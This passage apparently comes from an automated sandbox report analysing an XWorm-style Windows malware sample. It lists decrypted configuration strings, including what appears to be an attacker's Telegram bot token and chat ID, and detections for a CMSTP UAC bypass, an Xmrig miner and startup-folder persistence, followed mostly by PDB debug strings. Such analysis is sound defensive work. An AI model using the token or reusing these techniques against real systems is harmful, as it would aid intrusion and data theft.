                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpackString decryptor: <Xwormmm>
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpackString decryptor: pdr326
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpackString decryptor: USB.exe
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpackString decryptor: 6330888131:AAE5ycZdHuNqV5SVYhHeCfRENn6GuCjwXjs
                  Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.raw.unpackString decryptor: 1046049845
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exeCode function: 16_2_00007FF7FE544C1C CryptReleaseContext,16_2_00007FF7FE544C1C

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 00000008.00000002.1736044836.000001A4B2722000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1666528793.0000016E9B268000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.2341667196.00000292640E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1666528793.0000016E9AD6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000002.2447043666.000001BC90222000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.2223610242.000001B044693000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe PID: 432, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: spczxf.exe PID: 2908, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ohvrxt.exe PID: 1384, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: hgzxhw.exe PID: 3660, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: utntwb.exe PID: 5788, type: MEMORYSTR

                  Bitcoin Miner

                  barindex
                  Yara detected Xmrig cryptocurrency miner
                  Source: Yara matchFile source: 0000001B.00000002.2296563820.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3260, type: MEMORYSTR
                  Source: unknownHTTPS traffic detected: 104.98.116.138:443 -> 192.168.2.7:49725 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49732 version: TLS 1.2
                  Source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: System.Drawing.Design.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Data.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Diagnostics.Tracing.pdbMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xaml.pdb:\W@ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.Services.Design.pdb( source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.DataVisualization.Design.pdb(~ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Net.Http.WebRequest.pdbh- source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Messaging.pdb( source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Numerics.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.WorkflowServices.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.pdb( source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.DynamicData.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: msbuild.exe, 00000025.00000000.2320139777.0000000000062000.00000002.00000001.01000000.00000013.sdmp, msbuild.exe.27.dr
                  Source: Binary string: mscorlib.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.ServiceProcess.pdbP source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: XsdBuildTask.pdb8 source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Device.pdb$ source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.ServiceProcess.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Web.ApplicationServices.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: XsdBuildTask.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: HFayo.pdb source: WER2A76.tmp.dmp.6.dr
                  Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: sysglobl.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.pdb` source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.RegularExpressions.pdbMZ@ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: NGenTaskLauncher.pdbSystem.Runtime.Serialization.Formatters.dllSystem.Runtime.CompilerServices.VisualC.dllSystem.Diagnostics.TextWriterTraceListener.dll source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: CustomMarshalers.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.IO.Compression.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Activities.Build.pdbSystem.Net.WebSockets.Client.dll source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Design.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.pdbH source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.DurableInstancing.pdb:\W source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: 0C:\Windows\HFayo.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665472479.00000042D62F3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.VisualC.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Activities.DurableInstancing.pdbp source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Workflow.ComponentModel.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceModel.Activation.pdb source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: mscorlib.pdb source: spczxf.exe, 00000008.00000002.1740777553.000001A4CD9E1000.00000004.00000020.00020000.00000000.sdmp, WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: ISymWrapper.pdb$XPAxq source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xml.Linq.pdb` source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.AddIn.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.ServiceModel.Discovery.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceModel.Internals.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Web.Services.pdbMZ source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Data.Entity.Design.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.pdbSystem.Collections.Specialized.dll source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Numerics.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Entity.Design.pdbP source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.ServiceModel.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Accessibility.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Accessibility.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: C:\Windows\Containers\Confidential\DotnetGenerator\Stub\Projects\HFayo\obj\Release\HFayo.pdb( source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4DE1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.DirectoryServices.pdbMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xml.pdbMZ source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Net.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.Caching.pdbH source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.DataVisualization.pdb` source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Data.Entity.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Numerics.Vectors.pdbp^ source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Security.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.DataVisualization.pdbY source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: \??\C:\Users\user\Desktop\HFayo.pdbb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4DE1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.IdentityModel.Services.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: C:\Windows\Containers\Confidential\DotnetGenerator\Stub\Projects\HFayo\obj\Release\HFayo.pdbH source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4DE1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.Build.Conversion.v4.0.pdbMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb6 source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665839826.0000016E99246000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ServiceProcess.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Configuration.Install.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Services.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Design.pdbP source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Xml.Serialization.pdbJ> source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Xaml.Hosting.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Drawing.Design.pdbH source: WER95BE.tmp.dmp.46.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Users\user\Desktop\HFayo.pdbL source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4DE1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.Linq.pdbpH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.WorkflowServices.pdbh source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.Linq.pdbP< source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.IO.Compression.FileSystem.pdbSystem.WorkflowServices.dllSystem.WorkflowServices.dllSystem.ServiceModel.Web.dllSystem.ServiceModel.NetTcp.dllSystem.ServiceModel.Web.dllp source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Deployment.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Data.Services.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb>sFm source: spczxf.exe, 00000008.00000002.1740777553.000001A4CD870000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Web.Extensions.pdbMZ@ source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.IdentityModel.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Activities.Presentation.pdbXK source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.WorkflowServices.pdbp source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Messaging.pdbh source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Data.SqlXml.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Core.pdbbb source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Xml.pdbH source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4DE1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbe source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665839826.0000016E99254000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: symbols\exe\HFayo.pdbVi.pdbpdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665472479.00000042D62F3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Data.SqlXml.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Windows.Forms.pdb[' source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Management.pdbH source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr
                  Source: Binary string: NGenTaskLauncher.pdb source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: C:\Users.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665472479.00000042D62F3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbT source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4DE1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.AddIn.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbv10.03P source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Web.pdbp source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.VisualBasic.Compatibility.Data.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: SMDiagnostics.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Entity.Design.pdbP.d source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.ServiceModel.WasHosting.pdbP source: WER95BE.tmp.dmp.46.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Web.DynamicData.pdbMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbn source: spczxf.exe, 00000008.00000002.1740777553.000001A4CD9E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Diagnostics.Tracing.pdbP source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.Windows.ApplicationServer.Applications.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Internal.Tasks.Dataflow.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Internal.Tasks.Dataflow.pdbSystem.Messaging.dllSystem.Data.Linq.dllSystem.Data.SqlXml.dllSystem.Deployment.dllH source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Web.pdbH source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Workflow.ComponentModel.pdb8N source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Workflow.Runtime.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: NGenTaskLauncher.pdbP source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Numerics.pdbMicrosoft.Data.Entity.Build.Tasks.dllSystem.Runtime.InteropServices.RuntimeInformation.dllSystem.Runtime.InteropServices.RuntimeInformation.dllH source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp, spczxf.exe, 00000008.00000002.1740777553.000001A4CD870000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Data.Linq.pdb0 source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.Transactions.Bridge.Dtc.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Management.Instrumentation.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.Services.Client.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Web.Extensions.Design.pdbP source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Xaml.Hosting.pdb_L source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.DataSetExtensions.pdbSystem.Threading.Tasks.Parallel.dll source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.ComponentModel.Composition.Registration.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\symbols\exe\HFayo.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4DE1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.CSharp.pdbH source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Build.Utilities.v4.0.pdbP source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: spczxf.exe, 00000008.00000002.1740777553.000001A4CD9D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.IdentityModel.Selectors.pdbSystem.Text.Encoding.dll source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.UI.Xaml.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.pdbSystem.Messaging.dllSystem.Data.SqlXml.dllMZ source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: Microsoft.CSharp.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Configuration.Install.pdb` source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Activities.Build.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: spczxf.PDB source: spczxf.exe, 00000008.00000002.1734269034.00000098BFCF3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.JScript.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Windows.Forms.DataVisualization.Design.pdbH source: WER95BE.tmp.dmp.46.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ComponentModel.Composition.pdbSystem.Diagnostics.Contracts.dll source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceModel.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.VisualBasic.Activities.Compiler.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Routing.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Configuration.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Web.Services.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Data.Entity.Build.Tasks.pdbMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Accessibility.pdbSystem.Windows.Forms.DataVisualization.Design.dllP source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Abstractions.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: sysglobl.pdbMZ@ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.IdentityModel.Services.pdbMicrosoft.VisualBasic.Compatibility.Data.dllMicrosoft.VisualBasic.Activities.Compiler.dllMicrosoft.VisualBasic.Activities.Compiler.dllMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.IdentityModel.Selectors.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: BpC:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.PDB source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665472479.00000042D62F3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb| source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4DE1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Drawing.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Management.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: C:\Users\user\Desktop\HFayo.pdb\M source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665472479.00000042D62F3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Runtime.Serialization.pdbSystem.Security.SecureString.dll??\ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.ServiceModel.Web.pdb`@ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.IO.Compression.FileSystem.pdbMZ source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Web.DataVisualization.Design.pdbMicrosoft.Build.Framework.dllh source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Web.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbSILZ source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665839826.0000016E99246000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.IO.Log.pdbSystem.Diagnostics.TextWriterTraceListener.dll( source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Runtime.Remoting.ni.pdbRSDS-L source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Extensions.Design.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Accessibility.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.VisualC.pdbSystem.ValueTuple.dll source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Windows.Forms.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\spczxf.PDBn.0 source: spczxf.exe, 00000008.00000002.1740777553.000001A4CD9D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Data.Entity.pdb8 source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Drawing.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Workflow.Activities.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.IdentityModel.Services.pdbMZ source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Numerics.Vectors.pdbh source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.ServiceModel.pdbP source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Windows.Forms.DataVisualization.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Accessibility.pdbP source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr
